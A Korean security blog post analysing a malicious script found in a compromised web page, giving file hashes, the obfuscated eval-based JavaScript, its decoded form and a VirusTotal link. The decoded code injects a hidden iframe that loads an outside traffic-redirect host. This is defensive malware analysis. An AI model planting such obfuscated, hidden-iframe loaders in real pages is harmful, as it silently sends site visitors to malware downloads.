본문 바로가기
security/악성코드 유포

File : rst46815.htm , MD5 52060d2944fa64d564f0ac4dfbd83c56 Script !

Kwan's 2011. 9. 23. 13:01

File :

 rst46815.htm
MD5 :  52060d2944fa64d564f0ac4dfbd83c56
크기 : 3.71KB (3,806 바이트)
감염 사이트 : http://bydbest.com/xxx/rst46815.htm
Kaspersky : Trojan-Downloader.JS.Iframe.ciq
 
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" " 생략 ">
 <html xmlns=" 생략 ">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
 <title>Untitled Document</title>
 </head>
 <body><a href=" 생략 " target="_blank">Free dating, Friendship, sms</a>
 </body>
 
<!-- . --><script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("ev"+"al");
 e=window[aa.nodeValue];
 e(String.fromCharCode

(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,
118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,
68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,
123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,
99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,
103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,
(중간 코드 생략),11+o,102+o,113+o,101+o,119+o,111+o,103+o,
(중간 코드 생략),11+o,11+o,127+o));
 
</script><!-- . --> </html>
 

[Script 해독]

if (document.getElementsByTagName('body')[0]){
  iframer();
}
else {
  document.write("
<iframe src='http://neotraff.xx.xx/in.cgi?default' width='10' height='10' style='visibilit
y:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://neotraff.xx.xx/in.cgi?default');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}


[연결 되는 URL]

http://neotraff.xx.xx/in.cgi?default

[VirusTotal 결과]

http://www.virustotal.com/file-scan/report.html?id=025e13abacdf118eb22bf889fce543ce02e6a97c2d4753ca685d1fa00cd9246c-1316749355

MD5   : 52060d2944fa64d564f0ac4dfbd83c56
SHA1  : 857d18e3000994379d82b632c7d25c2dedf9478d
SHA256: 025e13abacdf118eb22bf889fce543ce02e6a97c2d4753ca685d1fa00cd9246c
저작자표시 비영리 변경금지

'security > 악성코드 유포' 카테고리의 다른 글

네이버 카스퍼스키 (HEUR:Trojan.Script.Iframer) 진단 사이트 보기 !!  (2) 2011.11.19
Decode Base 64 를 이용한 악성 스크립트!  (0) 2011.10.22
오랜만에 보는 악성 스크립트 !  (0) 2011.07.27
V3lite.jpg 로 위장한 악성코드 !!!!!!  (1) 2011.06.05
Eval 로 된 스크립트 간단하게 풀기 !!  (1) 2011.03.10

'security/악성코드 유포' Related Articles

티스토리툴바